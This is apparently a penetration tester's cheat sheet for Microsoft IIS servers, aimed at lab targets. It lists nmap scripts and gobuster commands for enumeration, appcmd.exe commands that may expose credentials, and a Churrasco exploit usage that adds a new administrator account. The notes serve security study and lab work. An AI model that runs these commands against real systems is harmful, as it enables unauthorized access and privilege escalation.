IIS

web, windows, enum

Ports #

Common Pages #

Headers #

Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

Recon #

# Nmap
nmap -p80 10.10.10.29 --script http-iis-webdav-vuln

# Other way of getting IIS version. You will see
# something like "Server: Microsoft-IIS/10.0"
curl -I http://10.10.10.29

# You can get the iisfinal.txt from hacktricks and
# feed it to gobuster.
curl https://firebasestorage.googleapis.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-L_YlVBGlH_l7w9zCtQO%2F-L_YlWYOMUA7fr799GvH%2Fiisfinal.txt?alt=media&token=de499b23-3599-45ce-ad7e-7800858b3dac -o iisfinal.txt
gobuster dir -u http://10.10.10.29 -w iisfinal.txt

Interesting Files #

# Constains sql connection strings, passwords and other
# sensitive data. This is similar to `.htaccess` in apache.
web.config

# index file
iisstart.htm

Logins #

# Nmap
nmap -p80 10.10.10.29 --script http-iis-short-name-brute

Downloads #

appcmd.exe #

# check if you have permissions
C:\Windows\system32\inetsrv\appcmd.exe list apppools

# may show credentials
C:\Windows\system32\inetsrv\appcmd.exe list vdir

Some Vulnerabilities #

# https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco.exe -d "net user /add <username> <password>"
c:\Inetpub>churrasco.exe -d "net localgroup administrators <username> /add"

Other resources #